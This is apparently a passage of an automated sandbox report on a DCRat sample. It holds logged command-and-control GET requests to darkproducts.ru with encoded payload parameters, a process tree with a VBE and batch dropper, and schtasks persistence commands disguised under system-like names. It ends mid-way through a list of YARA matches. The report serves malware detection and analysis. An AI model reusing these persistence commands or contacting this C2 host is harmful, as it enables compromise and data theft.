Jan 3, 2025 17:05:38.515693903 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:39.236140013 CET	935	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDOKmxi6QHGH3Um6DcEjfekEhA2U35yfv1u14wTNya6ZJACxSKAY190JtcGxl%2BpfOJK9y7jMIonyAbo2h3ULyDU9UWPX0nVdypGAFriKG0UdDK6NJJnKA%2BQBYYMOOET65sN15lLgoWNNGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43b464ef88c3b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50015	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:44.258023024 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:44.983715057 CET	934	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLZL6eeiWa6yZMBwsJgkcWpwVOKlEMlLquc%2BAp8AJL2g783kB1TqSJB8TLMZumdGT4Bl8tchw1WW%2FDI9gBuLGTSDDL9Rtp8hTqVb7L%2FBHdvWvw7BEqlKitY8WA9PKXiY9EBAMRRxFi2lxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43b6a2895f793-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50016	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:50.007626057 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:50.746175051 CET	943	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stj%2Bg2%2B0eUjz26JInHR15kLIEZxm%2B82FIea%2Bp%2BA4R%2BHOLljtx1BGo1T3%2B2BBfkVnlClHqFsgTZznjaqpbZ8k0EvRiQ5YgXwo%2FTISleGRm5n3SogxdFrxQTZn3SOV1DFabWpdpivQ52UmnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43b8e39c242fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50017	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:55.771361113 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:56.505438089 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZv4QrAk9ylDgTfmYe8o1imQn%2FSPqdy8s%2By0%2BnCn5EhbPe0qd5TVX%2BeCMoYjG1wHrYzaL3A3RJDgosCSrV3MdfcFjD204CCFaGYXdP2XNCFf3eHoub7ZpASk0aocSr%2Bdoxzeee0KZkQieg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43bb21d5a0f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Target ID:	0
Start time:	11:01:50
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\Mj6WEKda85.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Mj6WEKda85.exe"
Imagebase:	0x860000
File size:	1'244'405 bytes
MD5 hash:	3A74D8F05D5E7A64227D5521D1EB23AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:01:50
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe"
Imagebase:	0xa70000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:01:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:01:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:01:54
Start date:	03/01/2025
Path:	C:\savesbrokerCrt\driverDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\savesbrokerCrt\driverDhcp.exe"
Imagebase:	0xd90000
File size:	847'360 bytes
MD5 hash:	5073237558733D40EB37F2616E755ACF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2057566472.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2057566472.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKO" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:01:55
Start date:	03/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7067a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat"
Imagebase:	0x7ff73a960000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"
Imagebase:	0xe50000
File size:	847'360 bytes
MD5 hash:	5073237558733D40EB37F2616E755ACF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003674000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected 